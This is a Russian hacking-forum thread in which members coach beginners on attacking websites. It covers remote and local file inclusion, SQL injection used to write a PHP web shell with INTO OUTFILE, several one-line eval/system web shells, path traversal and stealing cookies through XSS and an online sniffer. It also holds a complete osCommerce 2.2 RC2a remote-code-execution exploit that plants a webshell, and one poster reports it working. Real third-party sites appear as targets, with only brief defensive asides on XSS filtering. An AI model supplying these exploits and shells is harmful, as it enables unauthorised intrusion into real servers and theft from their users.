B1t.exe, при чем здесь инклуд?

ммм, ребята, читая ЭТУ (http://forum.antichat.ru/thread12123.html) статью - так получается...
можете сказать как делать тогда ?
Там вообще показаны примеры инклуда на твоем сервере. Чувствую я, что ты ничего не понимаешь в этом...

B1t.exe
сделай на локалке что то подобное
<?php
$page = $_GET['page'];
include($page);
?>
и попробуй заюзать script.php?page=[inj]

ммм, ребята, читая ЭТУ (http://forum.antichat.ru/thread12123.html) статью - так получается...
можете сказать как делать тогда ?
На локалхосте поэксперементируй с LFI, а что у тя есть исходники страницы 123.ru/...., откуда ты узнал что id именно инклудится?

наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru

на мой сайт залил скрипт:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149

мой код на сервере под названием ххх.php.

я переделываю ссылку так:
http://www.123.ru/index.php?action=http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.

Я ошибку делаю, или просто на сайте фильтровывается ?

P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html


Для удаленного инклуда на срвере должен быть включен allow_url_include.
В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный.

P.S.: Почитай лутше вот эту статью:
http://forum.antichat.ru/thread23501.html
В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО.

я не понимаю .. на локалке. т.е. ?
на свем компе ? зачем?
я залил этот скрипт на сервер (интернет) и при запросе
www.mysite.ru/ххх.php
Parse error: syntax error, unexpected '.' in /home/www/mysite.ru/xxx.php on line 2
Я не знаю что там есть, просто в статье написан, что пыполните это на удаленном сервере и если выдаст те ошибки, значит инклюд есть. по этому и я так делал.

b1t.exe, иди учи php

Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
я не понимаю .. на локалке. т.е. ?
там,где якобы уязвимость.

2B1t.exe, омг.


<?
Include ("$page.php");
?>


Точки забыл убрать)

Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
Затем можешь заюзать такой скриптек:

<?
$inc = $_GET['file'];
include ($inc);
?>

И реализовуй:
localhost/script.php?file=http://google.com

Затем постепенно усложняй:

<?
$inc = $_GET['file'];
if(file_exists($inc))
{
include ($inc);
}
else
{
echo 'ERROR!';
}
?>

И снова реализовуй:
localhost/script.php?file=ftp://login:pass@host/file.php

И так далее.

Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
https://forum.antichat.ru/thread106780.html
По аналогии и с ЛФИ, нy кароче ты понял)

нy кароче ты понял)
Сомневаюсь...

B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.

Точки забыл убрать)
))))))) ага, точно ! спасибо большое.

У меня на этом сервере нет ничего. я специально брал домен и хост для тренировки. хост конечно, бесплатный, но поддерживает почти все, что надо.

я специально брал домен и хост для тренировки
о___О

А на своей тачке потестить не судьба?)

mailbrush

Ok. скачаю видеокурсы, и посмотрю/послушаю. сам ужестыдно спросить каждую мелочь..

Ins3t

сюдьба, даже есть денвер. просто смотря некоторые ролики в ютубе, сделал вывод, что надо иметь свой хост, чтоб туда грузить скрипты чтоб с сайтахинклюдить туда(или оттуда).. блин, уже запутался ))))))

Для использования инклуда php знать нинадо ИМХО Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда. И вообще локальный инклуд не часто встречается,удалённый тем более,так что лучше купи пива и раслабся,жизнь она штука сложная,не надо её себе ещё больше усложнять)

Для использования инклуда php знать нинадо ИМХО
Это сугубо твое мнение.
Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда. Все взаимосвязано, если он прочитает про инклюд, у него возникнет множество вопросов, ответ на которых он сможет получить, прочитав книжку по PHP.

ну.. все говорят: читай статьи а ачате ! читаю, и скажу, что 40% не понимаю из них, так как там пишут для тех, кто уже знает эти операторы или как там ..
а я не знаю не php, не perl и не sql (да и вообше я долек от кодинга). В универе проходит только паскаль и дельфи, и тот кое как препод расказал что это за чудо !

P.S. а какую книгу или видео посоветовали бы для изучение поверхности php?
когда то видел такую книгу, как PHP глазами хакера (http://www.ozon.ru/context/detail/id/2460012/) (Михаил Фленов)
Это пойдет или тут тоже ориентировано для УЖЕ знающий PHP ?

B1t.exe
Завязывай задавать свои вопрсы в этой теме. Тема называется:
Ваши вопросы по уязвимостям.
Правила в первом посте, придерживайся их. Дальнейший оффтоп буду тереть. Можешь спрашивать вот тут:
https://forum.antichat.ru/thread153877.html

Я специально её не удалил

2B1t.exe, если верить нерезусу - то эта книга херня!
Тебе по сути пойдет любая.
in google --> книга по php 5 или books for php 5.

И в дальнейшем: вопросы по пхп и литературе пости в кодинг, так как к этой теме php имеет только косвенное отношение.

Для использования инклуда php знать нинадо ИМХО
Абсолютно неверно! Если подставить &var=/etc/passwd или &var=http://google.com/? тогда да, а если нет? =) что же делать без знания php? =) Ведь такие инклуды постепенно уходят, а остаются более мудренные, а там одной фантазией не обойдешься!

Для использования инклуда php знать нинадо ИМХО
Абсолютно неверно!
все таки при инклюде есть гораздо более важные моменты которые нужно знать, нежели php. но php знать все равно надо, иначе это быдло хакерство и никакого прогресса не будет ))

Dyxxx, ну, что знать?
расположение логов? это брут (читать как тупой (!) перебор, думать не нужно)
environ? опять же та же ерунда, мозги не нужны.
А вот как составить запросы для работы с base, filter, php:// и т.п. тут уже и язык знать нужно, это тоже не верх сложности, однако тут и это многим не по силам, я знали бы пхп, и половины это темы не было бы.

в большинстве случаев, самых поверхностных знаний php будет достаточно при пхпинъекте и раскрутки до рута.
наши рассуждения тут не уместны не будем флудить чье молоко вкуснее ;)

http://site.ua/search.php?&stdfilter=4&instancetype=file&start=10+order+by+1--

Что здесь можно сделать?

MysqlDatabase::query - could query: SELECT /* ====================== fileinfo fields === */ f.id, f.name, f.size, f.description, DATE_FORMAT(f.uploaded, '%e.%m.%Y %H:%i') as uploaded, f.downloads, f.md5_hash, f.user_id, u.name as user_name, u.private as user_private, DATE_FORMAT(DATE_ADD( IF(f.lastdownload <> '00-00-0000 00:00:00', f.lastdownload, f.uploaded), INTERVAL c.delafter DAY), '%e.%m.%Y') as willremove, (SELECT COUNT(*) FROM filecomment WHERE file_id = f.id) as comment_count, f.password, f.tree_id, f.category_id, ctg.name as category_name, IF(u.id <> -1 AND u.deadline > NOW(), 1, 0) as premium, f.isprivate, f.ispermanent, fu.upload_id, /* ====================== search fields === */ 1 as is_file, 1000 as order_row, UCASE(f.name) as name_sort, UCASE(f.description) as description_sort, DATE_FORMAT(f.uploaded, '%Y%j%H%i') as uploaded_sort, DATE_FORMAT(DATE_ADD( IF(f.lastdownload <> '00-00-0000 00:00:00', f.lastdownload, f.uploaded), INTERVAL c.delafter DAY), '%Y%j') as willremove_sort, 0 as files_count FROM file f JOIN cleanup c ON f.size >= c.gebytes AND f.size < c.ltbytes JOIN category ctg ON ctg.id = f.category_id JOIN user u ON u.id = f.user_id LEFT JOIN fileupload fu ON fu.file_id = f.id WHERE f.id IN (901157417, 9011574,........ 901157658, 901157659, 901157660) ORDER BY is_file ASC , uploaded_sort desc LIMIT 10 order by 1--, 10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1--, 10' at line 47

2Cybersteger
инъекция в лимите, после ордер бая, ничего не сделаешь.

Cybersteger, у тебя инъекция в лимите, а оператор ORDER должен идти перед LIMIT.

http://upload.com.ua/search.php?&stdfilter=4&instancetype=file&start=10 ггг)))))

2Cybersteger
Но я то поняв а что можно из этого вытянуть ? ничо?
Я тебе ясно сказал, что непонятного? (Инъекция в лимите после ордербая невозможна)

Благодарю за то что просветили

как отправить ПОСТ-запрос, не нажимая на кнопку субминт?

как отправить ПОСТ-запрос, не нажимая на кнопку субминт?
сформировать пакет и отправить (сокеты\curl)

2Cybersteger

Я тебе ясно сказал, что непонятного? (Инъекция в лимите после ордербая невозможна)
Почему же? Можно попробовать залить шелл с помощью into outfile, если есть file_priv.

Почему же? Можно попробовать залить шелл с помощью into outfile, если есть file_priv.
Это не ответ. Поясни пожалуйста. Насколько мне известно в лимите выражения не работают. Никакие.

Поясняю
SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>'

сформировать пакет и отправить (сокеты\curl)
Спасибо. А пример можно?

Можно отправить с помощью javascript.

<form action="/script.php" method="post">
<input type="text" name="param" value="lol">
</form>
<script language="javascript">
document.forms[0].submit();
</script>

Или из строки браузера

javascript:document.forms[номер формы].submit();

А как с помощью сокета?

http://rus-phpnuke.com/php/f/fsockopen.html
vorona темой ошибся

http://rus-phpnuke.com/php/f/fsockopen.html
vorona темой ошибся
та я везде ошибаюсь. оттуда прогнали, оттуда прогнали... неужеди трудно посоветовать...

и там нету ничего, что мне нужно. те ф-ции я знаю.
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?

есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?

Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?

и там нету ничего, что мне нужно. те ф-ции я знаю.
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
как вариант
<?php
$ci = curl_init(); // открываешь соединение
curl_setopt($ci, CURLOPT_URL, "http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ci, CURLOPT_POST, true); // выбираешь пост запрос
curl_setopt($ci, CURLOPT_POSTFIELDS, "параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>

to Qwazar
SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>'
Круто, не знал, не видел никогда. блин круто.

to vorona
А еще можно на JS с помощью AJAX обращаться к скрипту пост запросом :)

Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?
ничего. но в своей форме опять же нада нажимать на кнопку субмит. ничё не меняется по сути.

как вариант
<?php
$ci = curl_init(); // открываешь соединение
curl_setopt($ci, CURLOPT_URL, "http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ci, CURLOPT_POST, true); // выбираешь пост запрос
curl_setopt($ci, CURLOPT_POSTFIELDS, "параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>
спс, попробую таким способом.

Fatal error: Unknown function: curl_init() in T:\home\virtual\site.ru\spam.php on line 2

Синий фломастер пишет белым....


зы: Мне тоже такие бестолковые посты начинать писать???

Когда же гугл станет домашней страницей ворон...и других?

https://forum.antichat.ru/showthread.php?t=103580
http://forum.antichat.ru/showthread.php?t=55424
http://forum.dklab.ru/viewtopic.php?t=7155

просто поставь пакет с новым пхп, за одно и его обновиш. на php.net точно он есть

Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?

Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
<?php system($_GET[cmd]); ?>

:(

Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
:( печальный вопрос
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>

и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН

Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
а ты передавал команды?

Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
возможно надо сделать "Documents\ and\ Settings"

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
В Documents and Setting незайдёшь из шелла, ибо прав нету =\

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
в DOS формате заюзать попробуй ;)

кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д


Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.

Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
переметру cmd передавай пых код

Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.


Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>

Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
#10081 (http://forum.antichat.ru/showpost.php?p=1682315&postcount=10081) :mad:

переметру cmd передавай пых код

Если не трудно можно пример такого запроса для:

pwd;ls -l

Если не трудно можно пример такого запроса для:

pwd;ls -l
в случае с eval() то shell.php?cmd=system(ls -la);

:( печальный вопрос
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>

и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН

Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично

Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.

ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.

Вот отсюда взял

http://www.milw0rm.com/exploits/9556

хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]

в случае с eval() то shell.php?cmd=system(ls -la);


Не работает :(

я его чуть-чуть подправил...

Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================

хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]


СПАСИБО!!! РАБОТАЕТ. :) :) :)

Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================
Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся :)

Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся :)
Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок

Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок
Уважаемый. Я очень сильно сомневаюсь, что нормальные администраторы забыли пропатчить свою CMS, после того, как опубликовался сплоит на милворме, а после этого, ты хоть пост, хоть гет, хоть через сессию юзай сплоиты и шелы.

И потом:
<title>Форум АНТИЧАТ - безопасность WEB - интерфейсов</title>
По-этому здесь должны советовать не только как заюзать паблик сплоит, что бы админы не узнали о критической уязвимости :confused: а еще и советовать как это дело поправить :)

Не путай паблик и приват :o

Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly

Молодец, ты получил доступ к гостевым кукам, которые сайт устанавливает для любого посетителя

Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
нет.

аналогично посту на котором постил вчера(нестандартный скул), вот еще одинь но теперь MySQLi.
http://www.mytradingrobot.com/amember/signup.php?product_id=1')&paysys_id_not_required=&paysys_id=free&name_f=111-222-1934email@address.tst&name_l=111-222-1934email@address.tst&email=sample4%40email%2Etst&login=Jottiorg&pass0=111-222-1934email@address.tst&pass1=111-222-1934email@address.tst&do_payment=1&price_group=111-222-1934email@address.tst

выдает:
MYSQL ERROR:<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '2009-11-12', '2009-12-12', 'free', '0', 0, '81.95.235.1' at line 6<br />in query:<br />INSERT INTO amember_payments (member_id, product_id, begin_date, expire_date, paysys_id, amount, completed, remote_addr, data, time, tm_added, tax_amount) VALUES ('2938', '1')', '2009-11-12', '2009-12-12', 'free', '0', 0, '181.100.25.16', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:3:\"1\')\";s:22:\"paysys_id_not_required\";s:0:\"\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:29:\"111-222-1934email@address.tst\";s:6:\"name_l\";s:29:\"111-222-1934email@address.tst\";s:5:\"email\";s:17:\"sample4@email.tst\";s:5:\"login\";s:8:\"jottiorg\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:29:\"111-222-1934email@address.tst\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:3:\"1\')\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')

прочел статьи Elekt и kot777 не помогает. Помогите раскрутит

Есть еще уязвимость называется SQL иньекция как ее юзать ктонить знает???Или есть какая-нибуть прога для кражи куки с форумов?На ютубе видел видео как крали через какуюта прогу!!!

А про XSS можно по подробнее как красть или где можно почитать???В гугле полазил толком ничего не нашел(((

http://forum.antichat.ru/thread20140.html

на несколько строк ниже трудно было посмотреть?

нужна отдельная софтина для поиск админок, встроенных внутрь других не устраивает(типа SQLhelper)

нужна отдельная софтина для поиск админок, встроенных внутрь других не устраивает(типа SQLhelper)

http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392

А как через онлайн сниффер увести куки???Точнее через этот снифферhttp://hacker-pro.net/sniffer а то чето я протестил прошел по своей ссылки, а там написан ип мой и откуда перешел.Куков я чото найти не могу(((

в ксс отсылаешь куки на снифер, что сложного, тебе же дали статью, подумай наконец в первый раз в жизни СВОЕЙ головой САМ.

аналогично посту на котором постил вчера(нестандартный скул), вот еще одинь но теперь MySQLi.
http://www.mytradingrobot.com/amember/signup.php?product_id=1')&paysys_id_not_required=&paysys_id=free&name_f=111-222-1934email@address.tst&name_l=111-222-1934email@address.tst&email=sample4%40email%2Etst&login=Jottiorg&pass0=111-222-1934email@address.tst&pass1=111-222-1934email@address.tst&do_payment=1&price_group=111-222-1934email@address.tst

выдает:


прочел статьи Elekt и kot777 не помогает. Помогите раскрутит

ребята вы на это тоже посмотрите а то так и завалится под тупых вопросов

Как защититься от XSS?

Как защититься от XSS?
учить матчасть :(

Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.

Теперь надо разобратся как переделать свою XSS с запросом на сниффер))))

учить матчасть :(
йасно

Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.

Не самый лучший выбор, особенно если фильтруемое значение потом размещается где-нибудь в виде ссылки, например на форуме vbulletin

vorona фильтровать данные !

если на PHP пишем то strip_tags,htmlspecialchar,htmlentites кажеться вот так!
Смотри в мануале.
самого htmlspecialchar достаточно??

Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...

Можно ли что-то сделать с этими параметрами?

fng:

может и можно, а может и нельзя - ссылку в студию, попробуй перечитай свой вопрос и осознай, что разговариваешь с Землянами, а не с гуманоидными существами из галактики бетта, которые в совершенстве познали телепатию

2Pashkela, могут конечно быть дефекты, но все зависит от того что и где ты фильтруешь.

P.S.: к стати, замечал на какой то из версий воблы используеться эта ф-я в ббкодах, действительно были дефекты. Но данная функция далеко не единственный способ защиты ;)

Сообщение от Ins3t
Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.
Обсуждалось уже, htmlspecialchars() тоже обходиться.

']Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о

']Обсуждалось уже, htmlspecialchars() тоже обходиться.
show must go on

Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...

Можно ли что-то сделать с этими параметрами?
Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает?

order by 10000 --
order by 1 --
order by 4 --

union select 1,2,3,4 --

выводит 2,4 например

union select 1,concat_ws(0x3a,version(),user()),3,4 --

По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.

Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.

http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root

а что дальше? объясни плиз

По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter

как обходится htmlspecialchars??

n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать

Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о

1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:


<?php
$a = "javascript:document.write('<script>alert(0)</script>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?>


просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте

